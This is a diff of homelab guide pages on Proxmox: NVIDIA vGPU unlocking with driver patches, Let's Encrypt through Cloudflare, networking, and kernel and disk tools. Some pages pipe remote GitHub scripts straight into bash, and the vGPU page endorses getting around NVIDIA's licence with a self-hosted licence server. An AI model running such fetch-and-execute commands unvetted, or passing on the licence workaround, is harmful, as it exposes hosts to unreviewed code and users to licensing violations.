directory and compile the library. Depending on your hardware and internet connection that may take a while
cd vgpu_unlock-rs/
+cargo build --release
+
Create files for vGPU unlock The vgpu_unlock-rs library requires a few files and folders in order to work properly, lets create those
First create the folder for your vgpu unlock config and create an empty config file
mkdir /etc/vgpu_unlock
+touch /etc/vgpu_unlock/profile_override.toml
+
Then, create folders and files for systemd to load the vgpu_unlock-rs library when starting the nvidia vgpu services
mkdir /etc/systemd/system/{ nvidia-vgpud.service.d,nvidia-vgpu-mgr.service.d}
+echo -e "[Service]\nEnvironment=LD_PRELOAD=/opt/vgpu_unlock-rs/target/release/libvgpu_unlock_rs.so" > /etc/systemd/system/nvidia-vgpud.service.d/vgpu_unlock.conf
+echo -e "[Service]\nEnvironment=LD_PRELOAD=/opt/vgpu_unlock-rs/target/release/libvgpu_unlock_rs.so" > /etc/systemd/system/nvidia-vgpu-mgr.service.d/vgpu_unlock.conf
+
Have a vgpu supported card? Read here! If you don't have a card like the Tesla P4, or any other gpu from this list , please continue reading at Enabling IOMMU
Disable the unlock part as doing this on a gpu that already supports vgpu, could break things as it introduces unnecessary complexity and more points of possible failure:
echo "unlock = false" > /etc/vgpu_unlock/config.toml
+
Enabling IOMMU Note: Usually this isn't required for vGPU to work, but it doesn't hurt to enable it. You can skip this section, but if you run into problems later on, make sure to enable IOMMU. To enable IOMMU you have to enable it in your BIOS/UEFI first. Due to it being vendor specific, I am unable to provide instructions for that, but usually for Intel systems the option you are looking for is called something like "Vt-d", AMD systems tend to call it "IOMMU".
After enabling it in your BIOS/UEFI, you also have to enable it in your kernel. Depending on how your system is booting, there are two ways to do that.
If you installed your system with ZFS-on-root and in UEFI mode, then you are using systemd-boot, everything else is GRUB. GRUB is way more common so if you are unsure, you are probably using that.
Depending on which system you are using to boot, you have to chose from the following two options:
GRUB Open the file `/etc/default/grub` in your favorite editor The kernel parameters have to be appended to the variable `GRUB_CMDLINE_LINUX_DEFAULT`. On a clean installation that line should look like this GRUB_CMDLINE_LINUX_DEFAULT="quiet"
+
If you are using an Intel system, append this after `quiet`: intel_iommu=on iommu=pt
+
On AMD systems, append this after `quiet`: The result should look like this (for intel systems): GRUB_CMDLINE_LINUX_DEFAULT="quiet intel_iommu=on iommu=pt"
+
Now, save and exit from the editor using Ctrl+O and then Ctrl+X and then apply your changes: systemd-boot The kernel parameters have to be appended to the commandline in the file `/etc/kernel/cmdline`, so open that in your favorite editor: nano /etc/kernel/cmdline
+
On a clean installation the file might look similar to this: root=ZFS=rpool/ROOT/pve-1 boot=zfs
+
On Intel systems, append this at the end intel_iommu=on iommu=pt
+
For AMD, use this After editing the file, it should look similar to this root=ZFS=rpool/ROOT/pve-1 boot=zfs intel_iommu=on iommu=pt
+
Now, save and exit from the editor using Ctrl+O and then Ctrl+X and then apply your changes: proxmox-boot-tool refresh
+
Loading required kernel modules and blacklisting the open source nvidia driver We have to load the vfio
, vfio_iommu_type1
, vfio_pci
and vfio_virqfd
kernel modules to get vGPU working
echo -e "vfio\nvfio_iommu_type1\nvfio_pci\nvfio_virqfd" >> /etc/modules
+
Proxmox comes with the open source nouveau driver for nvidia gpus, however we have to use our patched nvidia driver to enable vGPU. The next line will prevent the nouveau driver from loading
echo "blacklist nouveau" >> /etc/modprobe.d/blacklist.conf
+
Applying our kernel configuration I'm not sure if this is needed, but it doesn't hurt :)
update-initramfs -u -k all
+
...and reboot
Check if IOMMU is enabled Note: See section "Enabling IOMMU", this is optional Wait for your server to restart, then type this into a root shell
dmesg | grep -e DMAR -e IOMMU
+
On my Intel system the output looks like this
[ 0.007235] ACPI: DMAR 0x000000009CC98B68 0000B8 (v01 INTEL BDW 00000001 INTL 00000001)
+[ 0.007255] ACPI: Reserving DMAR table memory at [mem 0x9cc98b68-0x9cc98c1f]
+[ 0.020766] DMAR: IOMMU enabled
+[ 0.062294] DMAR: Host address width 39
+[ 0.062296] DMAR: DRHD base: 0x000000fed90000 flags: 0x0
+[ 0.062300] DMAR: dmar0: reg_base_addr fed90000 ver 1:0 cap c0000020660462 ecap f0101a
+[ 0.062302] DMAR: DRHD base: 0x000000fed91000 flags: 0x1
+[ 0.062305] DMAR: dmar1: reg_base_addr fed91000 ver 1:0 cap d2008c20660462 ecap f010da
+[ 0.062307] DMAR: RMRR base: 0x0000009cc18000 end: 0x0000009cc25fff
+[ 0.062309] DMAR: RMRR base: 0x0000009f000000 end: 0x000000af1fffff
+[ 0.062312] DMAR-IR: IOAPIC id 8 under DRHD base 0xfed91000 IOMMU 1
+[ 0.062314] DMAR-IR: HPET id 0 under DRHD base 0xfed91000
+[ 0.062315] DMAR-IR: x2apic is disabled because BIOS sets x2apic opt out bit.
+[ 0.062316] DMAR-IR: Use 'intremap=no_x2apic_optout' to override the BIOS setting.
+[ 0.062797] DMAR-IR: Enabled IRQ remapping in xapic mode
+[ 0.302431] DMAR: No ATSR found
+[ 0.302432] DMAR: No SATC found
+[ 0.302433] DMAR: IOMMU feature pgsel_inv inconsistent
+[ 0.302435] DMAR: IOMMU feature sc_support inconsistent
+[ 0.302436] DMAR: IOMMU feature pass_through inconsistent
+[ 0.302437] DMAR: dmar0: Using Queued invalidation
+[ 0.302443] DMAR: dmar1: Using Queued invalidation
+[ 0.333474] DMAR: Intel(R) Virtualization Technology for Directed I/O
+[ 3.990175] i915 0000:00:02.0: [drm] DMAR active, disabling use of stolen memory
+
Depending on your mainboard and cpu, the output will be different, in my output the important line is the third one: DMAR: IOMMU enabled
. If you see something like that, IOMMU is enabled.
NVIDIA Driver This repo contains patches that allow you to use vGPU on not-qualified-vGPU cards (consumer GPUs). Those patches are binary patches, which means that each patch works ONLY for a specific driver version.
I've created patches for the following driver versions: - 16.2 (535.129.03) - Use this if you are on pve 8.0 (kernel 6.2, 6.5 should work too) - 16.1 (535.104.06) - 16.0 (535.54.06) - 15.1 (525.85.07) - 15.0 (525.60.12) - 14.4 (510.108.03) - 14.3 (510.108.03) - 14.2 (510.85.03)
You can choose which of those you want to use, but generally it's recommended to use the latest, most up-to-date version (16.2 in this case).
If you have a vGPU qualified GPU, you can use other versions too, because you don't need to patch the driver. However, you still have to make sure they are compatible with your proxmox version and kernel. Also I would not recommend using any older versions unless you have a very specific requirement.
Obtaining the driver NVIDIA doesn't let you freely download vGPU drivers like they do with GeForce or normal Quadro drivers, instead you have to download them through the NVIDIA Licensing Portal (see: https://www.nvidia.com/en-us/drivers/vgpu-software-driver/ ). You can sign up for a free evaluation to get access to the download page.
NB: When applying for an eval license, do NOT use your personal email or other email at a free email provider like gmail.com. You will probably have to go through manual review if you use such emails. I have very good experience using a custom domain for my email address, that way the automatic verification usually lets me in after about five minutes.
I've created a small video tutorial to find the right driver version on the NVIDIA Enterprise Portal. In the video I'm downloading the 15.0 driver, if you want a different one just replace 15.0 with the version you want:
After downloading, extract the zip file and then copy the file called NVIDIA-Linux-x86_64-DRIVERVERSION-vgpu-kvm.run
(where DRIVERVERSION is a string like 535.129.03
) from the Host_Drivers
folder to your Proxmox host into the /root/
folder using tools like FileZilla, WinSCP, scp or rsync.
⚠️ From here on, I will be using the 16.2 driver, but the steps are the same for other driver versions For example when I run a command like chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run
, you should replace 535.129.03
with the driver version you are using (if you are using a different one). You can get the list of version numbers here .
Every step where you potentially have to replace the version name will have this warning emoji next to it: ⚠️
Have a vgpu supported card? Read here! If you don't have a card like the Tesla P4, or any other gpu from this list , please continue reading at Patching the driver
With a supported gpu, patching the driver is not needed, so you should skip the next section. You can simply install the driver package like this:
⚠️
chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run
+./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run --dkms
+
To finish the installation, reboot the system
Now, skip the following two sections and continue at Finishing touches
Patching the driver Now, on the proxmox host, make the driver executable
⚠️
chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run
+
And then patch it
⚠️
./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run --apply-patch ~/vgpu-proxmox/535.129.03.patch
+
That should output a lot of lines ending with Self-extractible archive "NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run" successfully created.
+
You should now have a file called NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run
, that is your patched driver.
Installing the driver Now that the required patch is applied, you can install the driver
⚠️
./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run --dkms
+
The installer will ask you Would you like to register the kernel module sources with DKMS? This will allow DKMS to automatically build a new module, if you install a different kernel later.
, answer with Yes
.
Depending on your hardware, the installation could take a minute or two.
If everything went right, you will be presented with this message.
Installation of the NVIDIA Accelerated Graphics Driver for Linux-x86_64 (version: 535.129.03) is now complete.
+
Click Ok
to exit the installer.
To finish the installation, reboot.
Finishing touches Wait for your server to reboot, then type this into the shell to check if the driver install worked
You should get an output similar to this one
Tue Jan 24 20:21:28 2023
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 525.85.07 Driver Version: 525.85.07 CUDA Version: N/A |
+|-------------------------------+----------------------+----------------------+
+| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
+| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
+| | | MIG M. |
+|===============================+======================+======================|
+| 0 NVIDIA GeForce ... On | 00000000:01:00.0 Off | N/A |
+| 26% 33C P8 43W / 260W | 85MiB / 11264MiB | 0% Default |
+| | | N/A |
++-------------------------------+----------------------+----------------------+
+
++-----------------------------------------------------------------------------+
+| Processes: |
+| GPU GI CI PID Type Process name GPU Memory |
+| ID ID Usage |
+|=============================================================================|
+| No running processes found |
++-----------------------------------------------------------------------------+
+
To verify if the vGPU unlock worked, type this command
The output will be similar to this
0000:01:00.0
+ nvidia-256
+ Available instances: 24
+ Device API: vfio-pci
+ Name: GRID RTX6000-1Q
+ Description: num_heads=4, frl_config=60, framebuffer=1024M, max_resolution=5120x2880, max_instance=24
+ nvidia-257
+ Available instances: 12
+ Device API: vfio-pci
+ Name: GRID RTX6000-2Q
+ Description: num_heads=4, frl_config=60, framebuffer=2048M, max_resolution=7680x4320, max_instance=12
+ nvidia-258
+ Available instances: 8
+ Device API: vfio-pci
+ Name: GRID RTX6000-3Q
+ Description: num_heads=4, frl_config=60, framebuffer=3072M, max_resolution=7680x4320, max_instance=8
+---SNIP---
+
If this command doesn't return any output, vGPU unlock isn't working.
Another command you can try to see if your card is recognized as being vgpu enabled is this one:
If everything worked right with the unlock, the output should be similar to this:
Tue Jan 24 20:21:43 2023
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 525.85.07 Driver Version: 525.85.07 |
+|---------------------------------+------------------------------+------------+
+| GPU Name | Bus-Id | GPU-Util |
+| vGPU ID Name | VM ID VM Name | vGPU-Util |
+|=================================+==============================+============|
+| 0 NVIDIA GeForce RTX 208... | 00000000:01:00.0 | 0% |
++---------------------------------+------------------------------+------------+
+
However, if you get this output, then something went wrong
No supported devices in vGPU mode
+
If any of those commands give the wrong output, you cannot continue. Please make sure to read everything here very carefully and when in doubt, create an issue or join the discord server and ask for help there.
vGPU overrides Further up we have created the file /etc/vgpu_unlock/profile_override.toml
and I didn't explain what it was for yet. Using that file you can override lots of parameters for your vGPU instances: For example you can change the maximum resolution, enable/disable the frame rate limiter, enable/disable support for CUDA or change the vram size of your virtual gpus.
If we take a look at the output of mdevctl types
we see lots of different types that we can choose from. However, if we for example chose GRID RTX6000-4Q
which gives us 4GB of vram in a VM, we are locked to that type for all of our VMs. Meaning we can only have 4GB VMs, its not possible to mix different types to have one 4GB VM, and two 2GB VMs.
Important notes Q profiles can give you horrible performance in OpenGL applications/games. To fix that, switch to an equivalent A or B profile (for example GRID RTX6000-4B
)
C profiles (for example GRID RTX6000-4C
) only work on Linux, don't try using those on Windows, it will not work - at all.
A profiles (for example GRID RTX6000-4A
) will NOT work on Linux, they only work on Windows.
All of that changes with the override config file. Technically we are still locked to only using one profile, but now its possible to change the vram of the profile on a VM basis so even though we have three GRID RTX6000-4Q
instances, one VM can have 4GB of vram but we can override the vram size for the other two VMs to only 2GB.
Lets take a look at this example config override file (its in TOML format)
[profile.nvidia-259]
+num_displays = 1 # Max number of virtual displays. Usually 1 if you want a simple remote gaming VM
+display_width = 1920 # Maximum display width in the VM
+display_height = 1080 # Maximum display height in the VM
+max_pixels = 2073600 # This is the product of display_width and display_height so 1920 * 1080 = 2073600
+cuda_enabled = 1 # Enables CUDA support. Either 1 or 0 for enabled/disabled
+frl_enabled = 1 # This controls the frame rate limiter, if you enable it your fps in the VM get locked to 60fps. Either 1 or 0 for enabled/disabled
+framebuffer = 0 x74000000
+framebuffer_reservation = 0 xC000000 # In combination with the framebuffer size
+ # above, these two lines will give you a VM
+ # with 2GB of VRAM (framebuffer + framebuffer_reservation = VRAM size in bytes).
+ # See below for some other sizes
+
+[vm.100]
+frl_enabled = 0
+# You can override all the options from above here too. If you want to add more overrides for a new VM, just copy this block and change the VM ID
+
There are two blocks here, the first being [profile.nvidia-259]
and the second [vm.100]
. The first one applies the overrides to all VM instances of the nvidia-259
type (thats GRID RTX6000-4Q
) and the second one applies its overrides only to one specific VM, that one with the proxmox VM ID 100
.
The proxmox VM ID is the same number that you see in the proxmox webinterface, next to the VM name.
You don't have to specify all parameters, only the ones you need/want. There are some more that I didn't mention here, you can find them by going through the source code of the vgpu_unlock-rs
repo.
For a simple 1080p remote gaming VM I recommend going with something like this
[ profile . nvidia-259 ] # choose the profile you want here
+num_displays = 1
+display_width = 1920
+display_height = 1080
+max_pixels = 2073600
+
Common VRAM sizes Here are some common framebuffer sizes that you might want to use:
512MB: framebuffer = 0 x1A000000
+framebuffer_reservation = 0 x6000000
+
1GB: framebuffer = 0 x38000000
+framebuffer_reservation = 0 x8000000
+
2GB: framebuffer = 0 x74000000
+framebuffer_reservation = 0 xC000000
+
3GB: framebuffer = 0 xB0000000
+framebuffer_reservation = 0 x10000000
+
4GB: framebuffer = 0 xEC000000
+framebuffer_reservation = 0 x14000000
+
5GB: framebuffer = 0 x128000000
+framebuffer_reservation = 0 x18000000
+
6GB: framebuffer = 0 x164000000
+framebuffer_reservation = 0 x1C000000
+
8GB: framebuffer = 0 x1DC000000
+framebuffer_reservation = 0 x24000000
+
10GB: framebuffer = 0 x254000000
+framebuffer_reservation = 0 x2C000000
+
12GB: framebuffer = 0 x2CC000000
+framebuffer_reservation = 0 x34000000
+
16GB: framebuffer = 0 x3BC000000
+framebuffer_reservation = 0 x44000000
+
20GB: framebuffer = 0 x4AC000000
+framebuffer_reservation = 0 x54000000
+
24GB: framebuffer = 0 x59C000000
+framebuffer_reservation = 0 x64000000
+
32GB: framebuffer = 0 x77C000000
+framebuffer_reservation = 0 x84000000
+
48GB: framebuffer = 0 xB2D200000
+framebuffer_reservation = 0 xD2E00000
+
framebuffer
and framebuffer_reservation
will always equal the VRAM size in bytes when added together.
Adding a vGPU to a Proxmox VM Go to the proxmox webinterface, go to your VM, then to Hardware
, then to Add
and select PCI Device
. You should be able to choose from a list of pci devices. Choose your GPU there, its entry should say Yes
in the Mediated Devices
column.
Now you should be able to also select the MDev Type
. Choose whatever profile you want, if you don't remember which one you want, you can see the list of all available types with mdevctl types
.
Finish by clicking Add
, start the VM and install the required drivers. After installing the drivers you can shut the VM down and remove the virtual display adapter by selecting Display
in the Hardware
section and selecting none (none)
. ONLY do that if you have some other way to access the Virtual Machine like Parsec or Remote Desktop because the Proxmox Console won't work anymore.
Enjoy your new vGPU VM :)
Licensing Usually a license is required to use vGPU, but luckily the community found several ways around that. Spoofing the vGPU instance to a Quadro GPU used to be very popular, but I don't recommend it anymore. I've also removed the related sections from this guide. If you still want it for whatever reason, you can go back in the commit history to find the instructions on how to use that.
The recommended way to get around the license is to set up your own license server. Follow the instructions here (or here if the other link is down).
Common problems Most problems can be solved by reading the instructions very carefully. For some very common problems, read here:
The nvidia driver won't install/load If you were using gpu passthrough before, revert ALL of the steps you did or start with a fresh proxmox installation. If you run lspci -knnd 10de:
and see vfio-pci
under Kernel driver in use:
then you have to fix that Make sure that you are using a supported kernel version (check uname -a
) My OpenGL performance is absolute garbage, what can I do? Read here mdevctl types
doesn't output anything, how to fix it? Make sure that you don't have unlock disabled if you have a consumer gpu (more information ) vGPU doesn't work on my RTX 3080! What to do? Learn to read Support If something isn't working, please create an issue or join the Discord server and ask for help in the #proxmox-support
channel so that the community can help you.
DO NOT SEND ME A DM, I'M NOT YOUR PERSONAL SUPPORT When asking for help, please describe your problem in detail instead of just saying "vgpu doesn't work". Usually a rough overview over your system (gpu, mainboard, proxmox version, kernel version, ...) and full output of dmesg
and/or journalctl --no-pager -b 0 -u nvidia-vgpu-mgr.service
(← this only after starting the VM that causes trouble) is helpful. Please also provide the output of uname -a
and cat /proc/cmdline
Feed my coffee addiction ☕ If you found this guide helpful and want to support me, please feel free to buy me a coffee . Thank you very much!
Further reading Thanks to all these people (in no particular order) for making this project possible - DualCoder for his original vgpu_unlock repo with the kernel hooks - mbilker for the rust version, vgpu_unlock-rs - KrutavShah for the wiki - HiFiPhile for the C version of vgpu unlock - rupansh for the original twelve.patch to patch the driver on kernels >= 5.12 - mbuchel#1878 on the GPU Unlocking discord for fourteen.patch to patch the driver on kernels >= 5.14 - erin-allison for the nvidia-smi wrapper script - LIL'pingu#9069 on the GPU Unlocking discord for his patch to nop out code that NVIDIA added to prevent usage of drivers with a version 460 - 470 with consumer cards
If I forgot to mention someone, please create an issue or let me know otherwise.
Contributing Pull requests are welcome (factual errors, amendments, grammar/spelling mistakes etc).
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/lets-encrypt-cloudflare/index.html b/infrastructure/proxmox/lets-encrypt-cloudflare/index.html
new file mode 100644
index 000000000..fb360d541
--- /dev/null
+++ b/infrastructure/proxmox/lets-encrypt-cloudflare/index.html
@@ -0,0 +1,167 @@
+
Let's Encrypt with Cloudflare - 3os proxmox cloudflare letsencrypt Authors: fire1ce | Created: 2022-04-22 | Last update: 2022-07-18 Proxmox Valid SSL With Let's Encrypt and Cloudflare DNS This is a guide to how to setup a valid SSL certificate with Let's Encrypt and Cloudflare DNS
for Proxmox VE
. Let's Encrypt will allow you to obtain a valid SSL certificate for your Proxmox VE Server for free for 90 days. In the following steps, we will setup a valid SSL certificate for your Proxmox VE Server using Let's Encrypt and Cloudflare DNS Challenge. The process of renewing the certificate is done automatically by Proxmox VE Server and you do not need to do anything manually to renew the certificate.
Prerequisites Existing DNS record for the domain name you want to use for Proxmox VE. Cloudflare DNS Zone API Access Token. Cloudflare DNS Zone ID. I won't be covering the process of creating the Zone API Tokens in this guide. You can find more information about this process here .
Installation and Configuration The process will be done fully in the Proxmox web interface. Login to the Proxmox web interface, select Datacenter
, find ACME
and click on it.
At Account
section, click Add. Fill the Account Name
and E-Mail
. Accept the Terms and Conditions (TOC). Click Register
. This will register an account for Let's Encrypt service in order to obtain a certificate.
The output should be something like this:
At Challenge Plugin
section, click Add. Fill the Plugin ID
(name), at DNS API
choose Cloudflare Managed DNS
. CF_Token=
and CF_Zone_ID=
are the API Tokens and Zone ID for Cloudflare DNS - leave the rest empty.
The final screen should look like this:
Select the Pve Server
in my case its name proxmox
, under System
select Certificates
.
At ACME
section, click Edit
and select the Account
we created earlier.
Click Add
, select Challenge Type
DNS
and Challenge Plugin
the plugin we created earlier. Domain
is the domain name we want to use for the certificate. Click Create
.
Now its time to issue the certificate. Click Order Certificate Now
.
At this point Proxmox will try to issue the certificate from Let's Encrypt and validate it with Cloudflare DNS Challenge.
If all goes well, you will see the following:
Now the certificate is installed and ready to use. The renewal process is done automatically by Proxmox VE Server.
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/network/disable-ipv6/index.html b/infrastructure/proxmox/network/disable-ipv6/index.html
new file mode 100644
index 000000000..42b1a4c86
--- /dev/null
+++ b/infrastructure/proxmox/network/disable-ipv6/index.html
@@ -0,0 +1,171 @@
+
Disable IPv6 on Proxmox - 3os proxmox ipv6 Authors: fire1ce | Created: 2022-02-04 | Last update: 2022-06-30 Disable IPv6 on Proxmox Permanently By default, Proxmox IPv6 is enabled after installation. This means that the IPv6 stack is active and the host can communicate with other hosts on the same network via IPv6 protocol.
Output of ip addr
command:
You can disable IPv6 on Proxmox VE by editing the /etc/default/grub
file.
add ipv6.disable=1
to the end of GRUB_CMDLINE_LINUX_DEFAULT
and GRUB_CMDLINE_LINUX
line. Don't change the other values at those lines.
GRUB_CMDLINE_LINUX_DEFAULT = "ipv6.disable=1"
+GRUB_CMDLINE_LINUX = "ipv6.disable=1"
+
The config should look like this:
Update the grub configuration.
Save and exit. Reboot Proxmox Server to apply the changes.
Output of ip addr
command after disabling IPv6 on Proxmox VE:
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/network/proxmox-networking/index.html b/infrastructure/proxmox/network/proxmox-networking/index.html
new file mode 100644
index 000000000..f1f387065
--- /dev/null
+++ b/infrastructure/proxmox/network/proxmox-networking/index.html
@@ -0,0 +1,267 @@
+
Proxmox Networking - 3os proxmox network Proxmox Networking Official Proxmox networking documentation can be found here .
Basics Proxmox network configuration file location /etc/network/interfaces
+
Restart proxmox network service to apply changes systemctl restart networking.service
+
Example of Multi Network Interface Server The next examples will be based on the following network nics, ip addr
output:
1 : lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
+ link/loopback 00 :00:00:00:00:00 brd 00 :00:00:00:00:00
+ inet 127 .0.0.1/8 scope host lo
+ valid_lft forever preferred_lft forever
+2 : enp7s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 18 :c0:4d:00:9f:b7 brd ff:ff:ff:ff:ff:ff
+3 : enp6s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 18 :c0:4d:00:9f:b9 brd ff:ff:ff:ff:ff:ff
+4 : enp12s0f4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq master vmbr0 state UP group default qlen 1000
+ link/ether 00 :07:43:29:42:c0 brd ff:ff:ff:ff:ff:ff
+5 : enp12s0f4d1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 00 :07:43:29:42:c8 brd ff:ff:ff:ff:ff:ff
+6 : enp12s0f4d2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 00 :07:43:29:42:d0 brd ff:ff:ff:ff:ff:ff
+7 : enp12s0f4d3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 00 :07:43:29:42:d8 brd ff:ff:ff:ff:ff:ff
+8 : wlp5s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 8c:c6:81:f0:a6:9a brd ff:ff:ff:ff:ff:ff
+9 : vmbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
+ link/ether 00 :07:43:29:42:c0 brd ff:ff:ff:ff:ff:ff
+ inet 192 .168.100.12/24 scope global vmbr0
+ valid_lft forever preferred_lft forever
+
In order to identify the physical network interfaces corresponding to the Network Interface names in Proxmox you can follow this guide
Breakdown of the ip addr
output:
lo
is a loopback interface. enp7s0
is a 2.5G network interface. enp6s0
is a 1G network interface. enp12s0f4
is a 10G network interface. enp12s0f4d1
is a 10G network interface. enp12s0f4d2
is a 10G network interface. enp12s0f4d3
is a 10G network interface. wlp5s0
is a Wifi network interface vmbr0
is a bridge interface. The content of the /etc/network/interfaces
after fresh installation:
auto lo
+iface lo inet loopback
+
+iface enp12s0f4 inet manual
+
+auto vmbr0
+iface vmbr0 inet static
+ address 192 .168.100.12/24
+ gateway 192 .168.100.1
+ bridge-ports enp12s0f4
+ bridge-stp off
+ bridge-fd 0
+
+iface enp7s0 inet manual
+
+iface enp6s0 inet manual
+
+iface enp12s0f4d1 inet manual
+
+iface enp12s0f4d2 inet manual
+
+iface enp12s0f4d3 inet manual
+
+iface wlp5s0 inet manual
+
Info
vmbr0
is a bridge interface. It's used to provision network to virtual machines and containers on Proxmox VE Server. We can assign multiple network interfaces to the bridge interface with bridge-ports
option.
Static IP Bridge Configuration The following example shows a static IP configuration vmbr0
bridge interface, including two network interfaces enp12s0f4
and enp7s0
.
auto vmbr0
+iface vmbr0 inet static
+ address 192.168.100.12/24
+ gateway 192.168.100.1
+ bridge-ports enp12s0f4 enp7s0
+ bridge-stp off
+ bridge-fd 0
+
Configuring multi network interfaces to the bridge interface will provide you a failover behavior when the network interface is down or disconnected - for example, when specific switch is down.
Static IP Bridge with VLAN Aware Configuration The following example shows a static IP as above but with VLAN Aware bridge.
auto vmbr0
+iface vmbr0 inet static
+ address 192.168.100.12/24
+ gateway 192.168.100.1
+ bridge-ports enp12s0f4 enp7s0
+ bridge-stp off
+ bridge-fd 0
+ bridge-vlan-aware yes
+ bridge-vids 2-4094
+
DHCP Bridge Configuration The following example shows a DHCP configuration vmbr0
bridge interface, including two network interfaces enp12s0f4
and enp7s0
.
auto vmbr0
+iface vmbr0 inet dhcp
+ bridge-ports enp12s0f4 enp7s0
+ bridge-stp off
+ bridge-fd 0
+
DHCP Bridge with VLAN Aware Configuration The following example shows a DHCP as above but with VLAN Aware bridge.
auto vmbr0
+iface vmbr0 inet dhcp
+ bridge-ports enp12s0f4 enp7s0
+ bridge-stp off
+ bridge-fd 0
+ bridge-vlan-aware yes
+ bridge-vids 2-4094
+
Personal Network Configuration Here's a sample of the /etc/network/interfaces
file for a personal network:
auto lo
+iface lo inet loopback
+
+auto vmbr0
+iface vmbr0 inet dhcp
+ bridge-ports enp12s0f4 enp12s0f4d1 enp12s0f4d2 enp12s0f4d3 enp7s0
+ bridge-stp off
+ bridge-fd 0
+ bridge-vlan-aware yes
+ bridge-vids 2 -4094
+
+iface enp12s0f4 inet manual
+
+iface enp12s0f4d1 inet manual
+
+iface enp12s0f4d2 inet manual
+
+iface enp12s0f4d3 inet manual
+
+iface enp7s0 inet manual
+
+iface enp6s0 inet manual
+
+iface wlp5s0 inet manual
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/pvekclean/index.html b/infrastructure/proxmox/pvekclean/index.html
new file mode 100644
index 000000000..cf00b23fd
--- /dev/null
+++ b/infrastructure/proxmox/pvekclean/index.html
@@ -0,0 +1,186 @@
+
PVE Kernel Cleaner - 3os proxmox Authors: fire1ce | Created: 2022-03-15 | Last update: 2022-04-21 PVE Kernel Cleaner
Easily remove old/unused PVE kernels on your Proxmox VE system
Developers Jordan Hillis - Lead Developer The original pvekclean github page
What is PVE Kernel Cleaner? PVE Kernel Cleaner is a program to complement Proxmox Virtual Environment, which is an open-source server virtualization environment. PVE Kernel Cleaner allows you to purge old/unused kernels filling the /boot directory. As new kernels are released the older ones have to be manually removed frequently to make room for newer ones. This can become quite tedious and require extensive time spent monitoring the system when new kernels are released and when older ones need to be cleared out to make room. With this issue existing, PVE Kernel Cleaner was created to solve it.
Features Removes old PVE kernels from your system Ability to schedule PVE kernels to automatically be removed on a daily/weekly/monthly basis Run a simple pvekclean command for ease of access Checks health of boot disk based on space available Debug mode for non-destructive testing Update function to easily update the program to the latest version Allows you to specify the minimum number of most recent PVE kernels to retain Support for the latest Proxmox versions and PVE kernels Prerequisites Before using this program you will need to have the following packages installed. * cron * curl * git
To install all required packages enter the following command.
Debian: sudo apt-get install cron curl git
+
Installing You can install PVE Kernel Cleaner using either Git or Curl. Choose the method that suits you best:
Installation via Git Open your terminal.
Enter the following commands one by one to install PVE Kernel Cleaner:
git clone https://github.com/jordanhillis/pvekclean.git
+cd pvekclean
+chmod +x pvekclean.sh
+./pvekclean.sh
+
Installation via Curl Open your terminal.
Use the following command to install PVE Kernel Cleaner:
curl -o pvekclean.sh https://raw.githubusercontent.com/jordanhillis/pvekclean/master/pvekclean.sh
+chmod +x pvekclean.sh
+./pvekclean.sh
+
Updating PVE Kernel Cleaner checks for updates automatically when you run it. If an update is available, you'll be notified within the program. Simply follow the on-screen instructions to install the update, and you're all set with the latest version!
Usage Example of usage:
pvekclean [OPTION1] [OPTION2]...
+
+-k, --keep [number] Keep the specified number of most recent PVE kernels on the system
+ Can be used with -f or --force for non-interactive removal
+-f, --force Force the removal of old PVE kernels without confirm prompts
+-rn, --remove-newer Remove kernels that are newer than the currently running kernel
+-s, --scheduler Have old PVE kernels removed on a scheduled basis
+-v, --version Shows current version of pvekclean
+-r, --remove Uninstall pvekclean from the system
+-i, --install Install pvekclean to the system
+-d, --dry-run Run the program in dry run mode for testing without making system changes
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/vm-disk-expander/index.html b/infrastructure/proxmox/vm-disk-expander/index.html
new file mode 100644
index 000000000..bb8cc1e72
--- /dev/null
+++ b/infrastructure/proxmox/vm-disk-expander/index.html
@@ -0,0 +1,201 @@
+
VM Disk Expander - 3os proxmox virtualization Authors: fire1ce | Created: 2022-06-26 | Last update: 2022-06-26 Proxmox Virtual Machine Disk Expander Github Repository: Proxmox vm disk expander
Interactive disk expander for Proxmox's VM disks (including the partition) from your Proxmox host cli.
Curl Method Run the script once, without installing it.
bash <( curl -s https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/expand.sh)
+
Installer Install the script at Proxmox host for multiple use.
Run the following command from Proxmox host:
curl -sS https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/install.sh | bash
+
Usage Update Same as the installer.
curl -sS https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/install.sh | bash
+
Example usage/output ╭─root@proxmox ~
